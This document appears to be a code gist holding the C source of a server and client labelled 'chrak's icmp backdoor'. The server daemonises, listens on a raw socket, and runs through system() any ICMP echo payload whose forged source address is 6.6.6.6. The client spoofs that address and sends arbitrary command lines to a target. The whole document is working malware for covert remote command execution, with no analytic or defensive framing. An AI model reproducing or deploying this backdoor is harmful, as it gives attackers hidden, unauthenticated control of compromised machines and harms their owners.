gistfile1.h

/* chrak's icmp backdoor server */

#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netinet/in_systm.h>
#include <strings.h>
#include <unistd.h>
#include <linux/ip.h>
#include <linux/icmp.h>
#include <linux/if_ether.h>



int main(void)
{
    char *packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 55);
    struct icmphdr *icmp_header;
    struct iphdr *ip_header;
    char *data;
    int s;


    if ((void *) packet == NULL)
      {
          printf("Not enough memory\n");
          exit(-1);
      }
    ip_header = (struct iphdr *) (packet + 14);
    icmp_header = (struct icmphdr *) (packet + sizeof(struct iphdr) + 14);

    data = (packet + sizeof(struct iphdr) + sizeof(struct icmphdr) + 14);
    if ((s = socket(AF_INET, SOCK_PACKET, htons(ETH_P_IP))) == -1)
      {
          perror("socket");
          exit(-1);
      }
    if (fork())
        exit(0);
    if (setsid() < 0)
        exit(0);
    if (fork())
        exit(0);

    for (;;)
      {
          recv(s, packet, 1000, 0);
          if ((ip_header->saddr == inet_addr("6.6.6.6")) && (icmp_header->type == ICMP_ECHO))
              system(data);
      }

}

gistfile2.txt

/* chrak's icmp backdoor client */

#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <strings.h>
#include <unistd.h>
#include <linux/ip.h>
#include <linux/icmp.h>

unsigned short in_cksum(unsigned short *, int);


int main(int argc, char *argv[])
{
    char *packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 55);
    struct sockaddr_in sockinfo;
    struct icmphdr *icmp_header;
    struct iphdr *ip_header;
    char *cmdline;
    int i = 1, s;


    if (argc < 3)
      {
          printf("usage: %s <ip> <command line>\n", argv[0]);
          exit(-1);
      }
    ip_header = (struct iphdr *) (packet);
    icmp_header = (struct icmphdr *) (packet + sizeof(struct iphdr));
    cmdline = (packet + sizeof(struct iphdr) + sizeof(struct icmphdr));

    if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
      {
          perror("socket");
          exit(-1);
      }
    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &i, sizeof(int)) == -1)
      {
          perror("setsockopt");
          exit(-1);
      }
    ip_header->saddr = inet_addr("6.6.6.6");
    ip_header->daddr = inet_addr(argv[1]);
    ip_header->ttl = 60;
    ip_header->id = htons(getpid());
    ip_header->version = 4;
    ip_header->ihl = 5;
    ip_header->tos = 0;
    ip_header->protocol = IPPROTO_ICMP;

    icmp_header->type = ICMP_ECHO;

    for (i = 2; i < argc; i++)
        sprintf(cmdline + strlen(cmdline), "%s ", argv[i]);

    icmp_header->checksum = in_cksum((unsigned short *) icmp_header,
                               sizeof(struct icmphdr) + strlen(cmdline));

    ip_header->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr) + strlen(cmdline) + 1;

    sockinfo.sin_family = AF_INET;
    sockinfo.sin_addr.s_addr = ip_header->daddr;

    if (sendto(s, packet, ip_header->tot_len,
        0, (struct sockaddr *) &sockinfo, sizeof(struct sockaddr)) == -1)
      {
          perror("sendto");
          return -1;
      }
    exit(0);
}



unsigned short in_cksum(unsigned short *addr, int len)
{
    register int sum = 0;
    u_short answer = 0;
    register u_short *w = addr;
    register int nleft = len;
    while (nleft > 1)
      {
          sum += *w++;
          nleft -= 2;
      }
    if (nleft == 1)
      {
          *(u_char *) (&answer) = *(u_char *) w;
          sum += answer;
      }
    sum = (sum >> 16) + (sum & 0xffff);         /* add hi 16 to low 16 */
    sum += (sum >> 16);         /* add carry */
    answer = ~sum;              /* truncate to 16 bits */
    return (answer);
}